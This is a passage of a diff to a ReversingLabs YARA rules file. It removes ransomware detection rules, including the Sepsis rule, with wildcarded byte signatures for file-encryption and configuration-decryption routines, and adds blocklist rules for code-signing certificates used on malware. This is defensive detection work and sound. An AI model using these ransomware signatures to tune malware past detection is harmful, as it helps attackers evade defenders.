-            ?? 64 A1 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? FF D0 85 C0 78 ?? A1 ?? ?? ?? ?? 8D 0C 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 35
-        }
-		$fnv1a_hashing_v2 = {
-            55 8B EC 83 EC ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 50 ?? A1 ?? ?? ?? ??
-            89 55 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 75 ?? 33 C0 A3 ?? ?? ?? ?? 8B E5 5D C3 8B 42
-            ?? 8B 4C 10 ?? 8B 44 10 ?? 89 45 ?? 8D 04 11 89 45 ?? 3B C2 74 ?? 53 33 C9 56 57 89
-            4D ?? 39 48 ?? 74 ?? 8B 78 ?? 03 FA 8B 07 BE
-        }
-		$decrypt_configuration_v2_1 = {
-            55 8B EC 51 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C9 83 EA ?? 75 ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? BA 25 1B 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? BA 78 0C 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            BA 39 28 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA F1 40
-            00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA BF 11 00 00 B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 28 02 00 00 B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 3B 07 00 00 B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA A5 04 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? BA 0F 03 00 00 B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 C9 BE ?? ?? ?? ?? 85 FF 74 ?? 8B 15 ??
-            ?? ?? ?? 0F 1F 44 00 ?? 80 3C 0A ?? 8D 46 ?? 0F 45 C6 41 8B F0 3B CF 72 ?? 8D 0C B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 1D ?? ?? ?? ?? 85 DB 74 ?? 33 FF 85 F6 74 ?? 90
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 04 BB 47 3B FE 72 ?? 8B 0D ?? ??
-            ?? ?? 33 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 0F 1F 80 ?? ?? ?? ?? 8B 14 B3 8A 08 8D 40 ??
-            88 0A 8D 52 ?? 84 C9 75 ?? 33 C9 E8 ?? ?? ?? ?? 46 85 C0 75 ?? C7 04 B3 ?? ?? ?? ??
-            5F 5E 5B 8B E5 5D C3
-        }
-		$decrypt_configuration_v2_2 = {
-            55 8B EC 51 53 56 57 8B F2 8B F9 6B CE ?? E8 ?? ?? ?? ?? 8B C8 33 C0 89 4D ?? 85 C9
-            0F 84 ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 72 ?? 0F 28 0D ?? ?? ?? ?? 8B CE 83 E1 ?? 66
-            0F 1F 84 00 ?? ?? ?? ?? 0F 10 04 07 66 0F EF C1 0F 11 04 07 0F 10 44 07 ?? 66 0F EF
-            C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF
-            C1 0F 11 44 07 ?? 83 C0 ?? 3B C1 72 ?? 8B 4D ?? 3B C6 73 ?? 80 34 38 5F 40 3B C6 72
-            ?? 8B 5D ?? 8B D6 51 53 51 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 0B E8 ?? ??
-            ?? ?? 8B F8 8B 45 ?? 89 38 8B 45 ?? 85 FF 74 ?? 8B 0B 8B F0 F3 A4 8B C8 BE ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B C6 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_v2_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 56 57 66 90 64 A1 ?? ?? ?? ?? 0F 57 C0 C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 0F 13 44 24 ?? 8B 40 ?? 8B 40 ?? 8B 00 8B
-            50 ?? A1 ?? ?? ?? ?? 89 54 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B
-            42 ?? 8B 4C 10 ?? 8D 04 11 89 44 24 ?? 3B C2 74 ?? 33 C9 89 4C 24 ?? 39 48 ?? 74 ??
-            8B 40 ?? 03 C2 89 44 24 ?? 0F 1F 80 ?? ?? ?? ?? 8B 30 BF C5 9D 1C 81 8A 04 16 03 F2
-            46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA 83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF
-            69 F9 93 01 00 01 84 C0 75 ?? 8B 54 24 ?? 8B 4C 24 ?? 81 FF ?? ?? ?? ?? 74 ?? 8B 74
-            24 ?? 41 8B 44 24 ?? 83 C0 ?? 89 4C 24 ?? 89 44 24 ?? 3B 4E ?? 75 ?? 33 C0 A3 ?? ??
-            ?? ?? 6A ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF D0 85
-            C0 0F 88 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8B 07 48 83 F8
-            ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 46 ?? 8D 04 48 0F B7 0C 10
-            8B 46 ?? 8D 04 88 8B 04 10 03 C2 EB ?? 83 7F ?? ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 0F
-            85 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ?? 68 ?? ?? ?? ?? 6A ?? 8B 41
-            ?? 89 42 ?? 8B 41 ?? 89 42 ?? 8B 44 24 ?? 6A ?? 8B 40 ?? 8D 88 ?? ?? ?? ?? F7 D8 23
-            C8 8B 44 24 ?? 89 48 ?? 8D 4C 24 ?? 8B 54 24 ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? FF 76 ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B 4E
-            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 81 C1 ?? ?? ?? ?? 03 C1 50 E8 ?? ?? ?? ??
-            8B 4C 24 ?? 83 C4 ?? 8B 74 24 ?? 89 74 24 ?? 6A ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF
-        }
-		$encrypt_files_v2_p2 = {
-            71 ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8
-            ?? F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ??
-            33 FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47
-            8B 40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B C1
-            F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44 24
-            ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ?? ??
-            ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ?? ??
-            6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF E8
-            ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ?? ??
-            6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 0F 84
-            ?? ?? ?? ?? 8D 7E ?? 90 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44
-            24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8D 56 ?? 74 ?? 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8B 57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            C1 6A ?? EB ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8D 8C 24 ?? ?? ?? ?? 8B
-            57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 83 7A ?? ?? 8B 42 ?? 0F 8F ??
-            ?? ?? ?? 7C ?? 39 42 ?? 0F 87 ?? ?? ?? ?? 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4E
-        }
-		$encrypt_files_v2_p3 = {
-            8D 84 24 ?? ?? ?? ?? 83 C4 ?? 81 C1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 03 C1 50
-            E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? C7 00 ?? ?? ?? ?? EB ?? 8B 44 24 ?? C7 00 ?? ??
-            ?? ?? 8B 4C 24 ?? 8B 74 24 ?? 6A ?? 89 74 24 ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF 71
-            ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8 ??
-            F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? 33
-            FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47 8B
-            40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 46 ?? 0F 85 ??
-            ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85
-            C9 0F 84 ?? ?? ?? ?? 8D 7E ?? 66 0F 1F 44 00 ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D
-            7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B
-            C1 F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44
-            24 ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ??
-            ?? ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ??
-            ?? 6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF
-            E8 ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ??
-            ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 74
-            ?? 8D 7E ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1
-            72 ?? 85 C9 74 ?? F0 FF 05 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50
-            E8 ?? ?? ?? ?? FF D0 8D 46 ?? 50 E8 ?? ?? ?? ?? FF D0 8B CE E8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 5F 33 C0 5E 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $enum_resources_v1 ) and ( all of ( $find_files_v1_* ) ) and ( all of ( $encrypt_files_v1_* ) ) ) or ( ( $check_blacklisted_languages_v2 ) and ( $fnv1a_hashing_v2 ) and ( $create_net_host_trav_threads_v2 ) and ( all of ( $decrypt_configuration_v2_* ) ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "16:7f:d1:29:5b:3b:b1:02:db:b3:72:92:c8:38:e7:cd" and 1476921600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sepsis : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sepsis ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0c26d6e0-1d64-5f47-8e21-6710a531bc74"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "f09ca101-dd40-54d8-9235-1faf1e774dd4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Sepsis.yara#L1-L126"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "171ad074a780b45195c6e02b111b3883c58a4028e635c4d6b8ce27c5e05e35d7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13800-L13816"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1d46ccaa136cd7be30ffbf0eb09eb6485c543ff4bdbe99fa7ea3846841cbd41b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sepsis"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 84 24 ?? ?? ?? ?? 56 57 8B 3D ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF D7 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-		$search_files_2 = {
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ?? ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ??
-            ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ??
-            50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A
-        }
-		$search_files_3 = {
-            66 8B 0A 83 C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B
-            E5 5D C2
-        }
-		$search_files_4 = {
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ??
-            ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ?? ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A ?? 66 8B 0A 83
-            C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2
-        }
-		$encrypt_files_1 = {
-            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? FF D6 0F 10 05 ?? ?? ?? ?? 8B F8 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 0F 11 07 89 3D ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 47 ?? 0F 10 05 ??
-            ?? ?? ?? 0F 11 47 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 8D
-            45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? FF 75
-            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B CF 8D 51
-        }
-		$encrypt_files_2 = {
-            8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 4D ??
-            89 4D ?? FF D3 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF D6 FF 75 ?? 8B F0 6A ?? 56 E8 ??
-            ?? ?? ?? FF 75 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? FF 75 ?? 50 56 6A ?? 6A ??
-            6A ?? FF 75 ?? FF D3 8B F8 F7 DF 1B FF 23 FE 8B 35 ?? ?? ?? ?? 8B D7 8D 4A ?? 66 90
-            8A 02 42 84 C0 75 ?? 2B D1 8B CF E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84
-            C9 75 ?? 2B C2 57 A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 81 3D ?? ?? ?? ?? ?? ??
-            ?? ?? 0F 82 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_3 = {
-            55 8B EC 83 EC ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B C1 68 ?? ?? ?? ?? 50
-            89 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 0B C0 5F 8B E5 5D C3 53 6A ?? 57 FF
-            15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 8B D8 56 B8 ?? ??
-            ?? ?? 6A ?? 3B D8 0F 47 D8 53 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ??
-            75 ?? 5E 5B 0B C0 5F 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B
-            35 ?? ?? ?? ?? 89 45 ?? FF D6 57 FF D6 E8 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 05
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B F8 BE ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11
-            05 ?? ?? ?? ?? 85 DB 74
-        }
-		$encrypt_files_4 = {
-            8A 0C 06 8D 40 ?? 30 48 ?? 83 EA ?? 75 ?? 8B CF E8 ?? ?? ?? ?? 8B F7 83 C7 ?? 83 EB
-            ?? 75 ?? 8B 45 ?? 0F 10 06 50 0F 11 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B F2
-        }
-		$encrypt_files_5 = {
-            66 8B 02 83 C2 ?? 66 85 C0 75 ?? BB ?? ?? ?? ?? 2B D6 8D 7B ?? 66 8B 47 ?? 83 C7 ??
-            66 85 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? 83 C3 ?? F3 A4 66 8B 43 ?? 83 C3
-            ?? 66 85 C0 75 ?? 8B FB B9 ?? ?? ?? ?? 8B 5D ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5
-            53 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 35 ?? ?? ?? ?? 6A
-            ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 5E 5B 33 C0 5F 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $search_files_* ) ) and ( all of ( $encrypt_files_* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "25:3a:d2:5e:39:ab:e8:f8:fd:a9:fc:f6" and 1538662130 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Gwisinlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GwisinLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9f00e1b4-3692-5824-b614-724073532c1f"
-		date = "2022-10-11"
-		modified = "2022-10-11"
+		id = "b21365d0-eaff-51da-8b8e-6a6ee75a5b95"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Linux.Ransomware.GwisinLocker.yara#L1-L354"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c23c0b73bbefbd644ffe1398e1f14eec3a89945cb3c3ccbc6f46c57046b53505"
